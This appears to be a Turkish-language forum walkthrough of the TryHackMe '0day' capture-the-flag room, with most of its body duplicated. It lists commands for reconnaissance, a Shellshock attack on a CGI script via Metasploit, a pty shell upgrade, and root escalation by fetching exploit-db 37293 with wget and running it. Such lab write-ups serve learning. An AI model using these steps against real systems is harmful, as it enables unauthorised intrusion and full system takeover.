dostlar bugün size https://tryhackme.com/room/0day için yaptığım türkçe anlatımı yapacağım (link attım ama virustotale gerek yok herhalde zaten resmi bilinen bir ctf sitesi)
yorum yapmayı ve beğenmeyi lütfen unutmayınız konuya geçmeden önce
size burada kolay yolunu göstereceğim ve çok kolay diyeceksiniz, diğer öğreticiler biraz zor dostlar, kafanızı karıştırabilir
USER.TXT:
Keşif
önce nmap taraması yapıyoruz
nmap -sC -sV <host>
— — — — — — — —
daha sonra nikto ile web açık taraması yapıyoruz
nikto -h <host>
shellshock açığı olduğu görülür
__________________
gobuster dir -u http://<host>/cgi-bin -w /usr/share/wordlists/common.txt -x cgi yazarak siteyi tarıyoruz ve test.cgi’yi elde ediyoruz
Remote/Erişim
msfconsole yazarak metasploit framework’ü açıyoruz
daha sonra search shellshock yazarak exploitleri aratıyoruz
exploit/multi/http/apache_mod_cgi_bash_env_exec ‘i seçerek ayarları show options yapıp görüntüledikten sonra rhost, lhost ne varsa kendi hostlarınızı girin. Ardından TARGETURI’yı /cgi-bin/test.cgi girin
ardından exploit yazarak sistemi ele geçirin
shell komutunu kullanıp shell’e bağlanın
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ komutuyla etkileşimli shell’e geçiyoruz
cd /home/ryan dizinine girip user flag’i alabilirsiniz
(cat user.txt)
ROOT.TXT:
privesc
uname -a yazarak sürümü öğrendik ve exploit-db’den exploit arattık ve 37293 numaralı exploite ulaştık, indirip gcc ile execute ettik
python3 -m http.server yazdık ve wget komutuyla indirttik exploitimizi
daha sonra chmod 777 yetkisini veriyoruz dosyaya
./<exploit-dosyan> yazıp çalıştırıyoruz ve root oluyoruz
cd /root yazıp erişebilirsiniz root flag’ine ve kazandınız, başarılar
kaynak: https://stfels.medium.com (kendim yazdım bunu ve kendi makalem)
virustotal: https://www.virustotal.com/gui/url/...db95217531042aa946b83e6be6b0ed468f4?nocache=1
iyi forumlar.
yorum yapmayı ve beğenmeyi lütfen unutmayınız konuya geçmeden önce
size burada kolay yolunu göstereceğim ve çok kolay diyeceksiniz, diğer öğreticiler biraz zor dostlar, kafanızı karıştırabilir
USER.TXT:
Keşif
önce nmap taraması yapıyoruz
nmap -sC -sV <host>
— — — — — — — —
daha sonra nikto ile web açık taraması yapıyoruz
nikto -h <host>
shellshock açığı olduğu görülür
__________________
gobuster dir -u http://<host>/cgi-bin -w /usr/share/wordlists/common.txt -x cgi yazarak siteyi tarıyoruz ve test.cgi’yi elde ediyoruz
Remote/Erişim
msfconsole yazarak metasploit framework’ü açıyoruz
daha sonra search shellshock yazarak exploitleri aratıyoruz
exploit/multi/http/apache_mod_cgi_bash_env_exec ‘i seçerek ayarları show options yapıp görüntüledikten sonra rhost, lhost ne varsa kendi hostlarınızı girin. Ardından TARGETURI’yı /cgi-bin/test.cgi girin
ardından exploit yazarak sistemi ele geçirin
shell komutunu kullanıp shell’e bağlanın
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ komutuyla etkileşimli shell’e geçiyoruz
cd /home/ryan dizinine girip user flag’i alabilirsiniz
ROOT.TXT:
privesc
uname -a yazarak sürümü öğrendik ve exploit-db’den exploit arattık ve 37293 numaralı exploite ulaştık, indirip gcc ile execute ettik
python3 -m http.server yazdık ve wget komutuyla indirttik exploitimizi
daha sonra chmod 777 yetkisini veriyoruz dosyaya
./<exploit-dosyan> yazıp çalıştırıyoruz ve root oluyoruz
cd /root yazıp erişebilirsiniz root flag’ine ve kazandınız, başarılar
kaynak: https://stfels.medium.com (kendim yazdım bunu ve kendi makalem)
virustotal: https://www.virustotal.com/gui/url/...db95217531042aa946b83e6be6b0ed468f4?nocache=1
iyi forumlar.